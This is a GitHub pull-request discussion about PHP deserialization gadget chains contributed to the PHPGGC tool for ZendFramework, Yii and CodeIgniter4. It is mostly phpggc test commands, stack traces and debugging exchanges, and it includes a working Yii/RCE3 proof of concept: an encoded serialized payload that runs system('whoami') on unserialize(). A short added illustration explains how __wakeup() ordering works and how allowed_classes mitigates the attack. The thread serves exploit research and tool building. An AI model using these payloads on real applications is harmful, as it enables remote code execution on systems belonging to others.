Open CyanM0un opened 1 year ago
Hello CyanM0un,
That's amazing work ! I'll try and integrate it in the upcoming weeks, as you have said it is a lot of work :)
Charles
Hello,
Still haven't had time to check this amazing work. Will do in the upcoming weeks !
Hello,
I have started working on your GCs, CyanM0un. Every ZendFramework payload works except for the FI1:
$ php7.1 /tools/web/php/phpggc/phpggc ZendFramework/FI1 --test-payload
Trying to deserialize payload...
PHP Warning: Exception caught by form: Plugin by name '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' was not found in the registry; used paths:
:
Stack Trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2709): Zend_Loader_PluginLoader->load('/tmp/phpggc110c...')
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3458): Zend_Form->_getDecorator('/tmp/phpggc110c...', 'options')
#2 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2864): Zend_Form->_loadDecorator(Array, 'k')
#3 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(2992): Zend_Form->getDecorators()
#4 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php(3010): Zend_Form->render()
#5 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php(263): Zend_Form->__toString()
#6 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#7 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128) in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Form.php on line 3015
PHP Fatal error: Uncaught Zend_Service_Twitter_Exception: Invalid method "detachldap" in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php:266
Stack trace:
#0 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(195): Zend_Service_Twitter->__call('detachLdap', Array)
#1 /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Ldap/Node.php(128): Zend_Ldap_Node->detachLdap()
#2 [internal function]: Zend_Ldap_Node->__wakeup()
#3 /tools/web/php/phpggc/lib/test_payload.php(46): unserialize('O:14:"Zend_Ldap...')
#4 {main}
thrown in /home/cf/Downloads/ZendFramework-1.12.20/library/Zend/Service/Twitter.php on line 266
FAILURE: Payload did not trigger !
Any ideas why ?
Oh, in the last gadget class (Zend_Loader_PluginLoader), the function load will append a '.php' suffix to the file path, so '/tmp/phpggc110c813231d70d6d47e543bc48d27d69254966a5' may not be found.
Maybe we should specify that the chain only includes arbitrary PHP files.
Ok, fixed for Zend. Yii2 GCs work as well. Now, Yii/RCE3 tries to use PHPUnit_Extensions_Selenium2TestCase_Session, which is NOT included in the Yii 1.1.20 distribution.
I used the command composer create-project yiisoft/yii=1.1.20 yii1 to create the project for finding GCs. To be honest, I am a little confused about the difference and what the standard way may be. Kindly request your opinion :)
Ok, I used the package present in their github repository.
Do you by any chance still have your vendor/composer/installed.json? Now that I use your procedure, I get:
$ composer create-project yiisoft/yii=1.1.20 yii1
... blabla success
$ cd yii1
$ php7.4 /tools/web/php/phpggc/phpggc Yii/RCE3 --test-payload
Trying to deserialize payload...
PHP Fatal error: Uncaught Error: Call to undefined method DocBlox_Parallel_Worker::curl() in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php:194
Stack trace:
#0 /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php(173): PHPUnit_Extensions_Selenium2TestCase_Session->stop()
#1 [internal function]: PHPUnit_Extensions_Selenium2TestCase_Session->__destruct()
#2 {main}
thrown in /.../yii1/vendor/phpunit/phpunit-selenium/PHPUnit/Extensions/Selenium2TestCase/Session.php on line 194
FAILURE: Payload did not trigger !
I don't think that's the problem ... I tested it right now using the package and it worked, e.g.:
<?php
// Load Composer's autoloader and Yii 1.1's base class so every class in the chain resolves
include("./vendor/autoload.php");
include("./framework/YiiBase.php");
// URL-encoded serialized object graph produced by the Yii/RCE3 chain
$poc = "O%3A11%3A%22CDbCriteria%22%3A1%3A%7Bs%3A6%3A%22params%22%3BO%3A12%3A%22CMapIterator%22%3A3%3A%7Bs%3A16%3A%22%00CMapIterator%00_d%22%3BO%3A5%3A%22CForm%22%3A1%3A%7Bs%3A16%3A%22%00CForm%00_elements%22%3BO%3A44%3A%22PHPUnit_Extensions_Selenium2TestCase_Session%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00commands%22%3Ba%3A1%3A%7Bs%3A6%3A%22itemAt%22%3Bs%3A6%3A%22system%22%3B%7Ds%3A6%3A%22%00%2A%00url%22%3BO%3A40%3A%22PHPUnit_Extensions_Selenium2TestCase_URL%22%3A0%3A%7B%7Ds%3A9%3A%22%00%2A%00driver%22%3BO%3A23%3A%22DocBlox_Parallel_Worker%22%3A0%3A%7B%7D%7D%7Ds%3A19%3A%22%00CMapIterator%00_keys%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A18%3A%22%00CMapIterator%00_key%22%3Bs%3A6%3A%22whoami%22%3B%7D%7D";
// The chain fires from CDbCriteria::__wakeup() during unserialize()
unserialize(urldecode($poc)); // system('whoami')
The error was triggered in the PHPUnit_Extensions_Selenium2TestCase_Session#__destruct() process; however, the GC's function call should be triggered and finished in the CDbCriteria#__wakeup() process. DocBlox_Parallel_Worker doesn't have the curl function because in gadgets.php I simply pick up a class (DocBlox_Parallel_Worker) and assign it to the driver field of PHPUnit_Extensions_Selenium2TestCase_Session, which should not influence the command execution.
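An added illustration (not code from this PR, Yii or PHPUnit) of the point made above: a side effect in __wakeup() runs during unserialize() itself, so a later Error thrown from an unrelated __destruct() says nothing about whether the chain already executed; the same payload is inert under allowed_classes => false, because every object stays a __PHP_Incomplete_Class and no magic method fires. Class names and the payload are constructed for the demo.

```php
<?php
// Constructed stand-in for a gadget whose __wakeup() carries the side effect.
class WakeupGadget
{
    public $cmd = 'id';

    public function __wakeup()
    {
        // Runs inside unserialize(), before any object is destroyed.
        // A harmless echo stands in for the command execution in the thread.
        echo "[__wakeup] side effect for command: {$this->cmd}\n";
    }
}

// Constructed stand-in for the driver object that blows up on teardown,
// like the "Call to undefined method ...::curl()" seen in the Yii/RCE3 test.
class BrokenDriver
{
    public function __destruct()
    {
        throw new Error('Call to undefined method BrokenDriver::curl()');
    }
}

$payload = serialize([new WakeupGadget(), new BrokenDriver()]);

// 1. Plain unserialize(): __wakeup() fires first; the Error only surfaces
//    afterwards, when the object graph is released.
try {
    $objs = unserialize($payload);
    unset($objs);
} catch (Error $e) {
    echo "[__destruct] " . $e->getMessage() . " (raised after __wakeup ran)\n";
}

// 2. Mitigation: with allowed_classes => false PHP never instantiates the
//    real classes, so neither __wakeup() nor __destruct() can run.
$safe = unserialize($payload, ['allowed_classes' => false]);
foreach ($safe as $i => $obj) {
    echo "[allowed_classes=false] element $i is " . get_class($obj) . "\n";
}
```

Only the second call is safe to use on untrusted input; checking the payload against a list of expected classes (or avoiding PHP serialization entirely) is the fix, not catching the error.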
Ok, I was missing the YiiBase import :) Making progress!
Indeed a mountain of work. 😂 Best respect to you.
Hello @CyanM0un !
I am back to process a few more GCs. In CI4, RCE7, you use \Symfony\Component\HttpFoundation\Request, which does not seem to be included in the standard distribution of the framework. I tried:
$ composer create-project codeigniter4/appstarter=4.1.3 hello123
and
$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
Any ideas?
I used the second way; however, after I get the source code I usually use the command composer install to do the initialization, so \Symfony\Component\HttpFoundation\Request will be included.
Finally, thank you very much for your continued contact. I also admire your work on Iconv, set the charset to RCE!
(Actually, all these gadget chains I have submitted pull requests for were discovered by our automation tool. I personally think it works very well and I wonder if you could help promote it when we open-source it hahaha :)
This is what I am doing, but still, it does not work:
$ wget https://github.com/codeigniter4/framework/archive/refs/tags/v4.1.3.zip
$ unzip v4.1.3.zip
$ cd framework-4.1.3
$ composer install
$ phpggc CodeIgniter4/RCE7 --test-payload
Trying to deserialize payload...
PHP Fatal error: Uncaught Error: Object of class __PHP_Incomplete_Class could not be converted to string in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php:378
Stack trace:
#0 /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php(266): CodeIgniter\Session\Handlers\DatabaseHandler->releaseLock()
#1 /dev/shm/framework-4.1.3/system/Cache/Handlers/RedisHandler.php(70): CodeIgniter\Session\Handlers\DatabaseHandler->close()
#2 [internal function]: CodeIgniter\Cache\Handlers\RedisHandler->__destruct()
#3 {main}
thrown in /dev/shm/framework-4.1.3/system/Session/Handlers/DatabaseHandler.php on line 378
FAILURE: Payload did not trigger !
sorry, my URL is https://github.com/codeigniter4/CodeIgniter4/archive/refs/tags/v4.1.3.zip
Hi, I sorted out a few gadget chains of some frameworks. I have manually checked all of them, and some of them have passed the test-gc-compatibility script, for which I have modified the corresponding version range in chain.php. It seems like no small work for both of us :)